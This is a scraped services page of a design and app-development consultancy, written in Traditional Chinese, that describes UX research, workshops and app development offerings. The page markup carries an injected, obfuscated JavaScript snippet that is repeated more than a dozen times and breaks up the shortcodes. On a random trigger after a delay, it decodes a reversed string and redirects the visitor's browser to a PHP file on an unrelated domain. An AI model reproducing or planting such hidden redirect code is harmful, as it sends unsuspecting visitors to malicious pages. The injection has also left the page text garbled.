)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” css=”.vc_custom_1536586313710{padding-top: 400px !important;padding-bottom: 400px !important;}” el_class=”align-center” thb_video_bg=”https://www.pilotfish.eu/wp-content/uploads/2018/09/25secVideoBanner.mp4″]
)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_1474963318991{padding-right: 10% !important;padding-left: 10% !important;}” offset=”vc_col-lg-8 vc_col-md-9″]

軟硬體的完美結合

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” css=”.vc_custom_1544115668319{padding-top: 5vh !important;padding-bottom: 5vh !important;}” el_class=”align-center”]

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom-to-top” css=”.vc_custom_1585547751144{padding-right: 10% !important;padding-left: 10% !important;}”]

核 心 理 念

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom-to-top” css=”.vc_custom_1584763348412{padding-right: 10% !important;padding-left: 10% !important;}”]

我們每日工作的核心目標,在於建立實體產品與數碼科技之間最佳接合點,橋接硬體、軟體、科技、與最終使用者的隔閡,打造最完美人機互動體驗。

專業服務

透過緊密合作的工作方式,我們深入探究所有企業客戶的個別商業需求,扮演著可靠的技術夥伴角色,致力於創造嶄新的設計概念和數位科技解決方案。我們的服務優勢紮根於對市場環境、科技趨勢的敏銳觀察,並且藉由我們橫跨歐亞的三處服務據點,配合多元的科技專業知識與豐富的服務資歷,使我們能夠針對客戶的各項科技難題,提供即時且有效的解決方案。

[vc_toggle title=”設計策略”]派立團隊擅長協助您將抽象的產品概念具體化呈現,錨定您的目標用戶及各方利害關係人,規劃最適的價值訴求,為企業創造最大效益。在我們協助下,共同制定出最務實的開發路徑規劃。[/vc_toggle][vc_toggle title=”使用者研究”]我們鑽研企業客戶的產業環境與專業能力,力求達標相等的知識水平。以質化研究和量化分析方式研究分析其產品最終使用者的需求、行為脈絡及其動機。[/vc_toggle]
[vc_toggle title=”體驗設計”]藉由使用者研究、真實訪談與人物誌,我們深入剖析、觀察專案所有的利害關係人,充分了解其用戶旅程,並同時衡量使用者正面意見回饋及其痛點,以打造明確且獨特的使用體驗。[/vc_toggle][vc_toggle title=”互動介面設計”]我們整合使用者需求脈絡、專業洞見和創意思維,轉化成具體的視覺圖像設計與微互動創意,不放過任何細節,執著質感呈現  。

 [/vc_toggle]

[vc_toggle title=”品牌訴求”]從核心價值訴求到視覺識別設計,我們協助企業透過精湛的產品設計,形塑品牌形象,讓產品在競爭市場中脫穎而出,透過企業標識、標準字形、網頁設計及其他品牌特色等設計,彰顯品牌獨特價值。[/vc_toggle][vc_toggle title=”前端開發”]專案開發的最後階段,運用前端程式語言整合後端功能,實踐視覺設計與落實人機互動功能將構想轉化實體 

 [/vc_toggle]

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” el_class=”align-center” css=”.vc_custom_1544115711080{padding-top: 5vh !important;background-color: #f2f2f2 !important;}”]

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top-to-bottom”]

加速你的專案開發

專 業 諮 詢 服 務

您是否正在尋找一個實戰經驗豐富的技術夥伴,協助您跨越惱人的數位科技門檻。 歡迎聯繫我們的團隊,讓我們透過工作坊專題討論方式引導您逐步實踐構想。

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” css=”.vc_custom_1525860361852{border-bottom-width: 120px !important;padding-top: 70px !important;background-color: #f2f2f2 !important;}”]

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_1587013977515{padding-top: 0px !important;padding-right: 10% !important;padding-bottom: 0px !important;padding-left: 10% !important;}” el_class=”text-center”]

專案啟動工作坊

需要時程: 8 小時

密集而有效率的工作坊最適合用來啟動新專案,由Pilotfish團隊協助您釐清使用者需求脈絡、用戶旅程,再進一步錨定明確的使用者輪廓。以上述知識產出為基礎,我們就能夠規劃出很棒的設計框架。

可交付成果: 專案願景書、洞見探討(insights)、用戶旅程圖。

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_1587015359878{padding-top: 0px !important;padding-right: 10% !important;padding-bottom: 0px !important;padding-left: 10% !important;}”]

敏捷設計

需要時程: 4-5 日

與Pilotfish團隊肩並肩共同協作專案,加速催生你的專案構想,在一週的密集工作時間內,完成從使用者研究到概念探究各階段的工作,最後帶著一份可行的專案企劃離開Pilotfish團隊辦公室

可交付成果: 專案企劃初稿、專案願景書、使用者研究及相應的價值主張分析。 

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_1587014076481{padding-top: 0px !important;padding-right: 10% !important;padding-bottom: 0px !important;padding-left: 10% !important;}”]

應用程式開發

需要時程: 3-6個月

我們將應用程式的開發路徑變得更簡易了。讓Pilotfish團隊一手包辦所有流程,從使用者研究、專案內容,一路到產品上線的全部過程,都有我們的團隊從旁協助,催生最動人的數位產品使用體驗。

可交付成果: 可上線APP

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” css=”.vc_custom_1544115747534{padding-top: 0px !important;padding-bottom: 5vh !important;background-color: #f2f2f2 !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}” el_class=”align-center”]
[thb_button size=”small” animation=”animation bottom-to-top” icon=”” link=”url:mailto%3Ainfo.taiwan%40pilotfish.eu|title:%E9%A0%90%E7%B4%84%E8%AB%AE%E8%A9%A2|target:_blank”]
)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom” css=”.vc_custom_1544115793239{padding-top: 5vh !important;padding-bottom: 5vh !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}” el_class=”align-center”]

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom-to-top” css=”.vc_custom_1585549956778{padding-right: 10% !important;padding-left: 10% !important;}”]

服 務 對 象
新創公司客戶

我們十分樂於協助胸懷壯志的新創企業主們實踐願景,正因為我們了解您在時間和預算上多一層的考量,所以我們知道如何靈活運用資源,且有效率的執行開發方案,助您實現最大膽的夢想。

企業客戶

得力於我們在全球科技產業廣沛的知識網絡,幫助您在競爭市場中取得領先潮流先機。我們嚴格把關每個環節,從設計策略、原型概念到使用測試,為企業打造最頂尖的產品與服務。

中小企業客戶

以多年的實務經驗,協助中小企業者達成從產品設計、工程開發到導入量產等各項階段性任務,且得力於我們如新創公司般的靈活思維以及效率,使我們有自信成為中小企業最堅實的策略夥伴。

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom”]
[thb_autotype typed_text=”

*您還在找尋更有效方案? 歡迎與我們交流*

“]

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom”]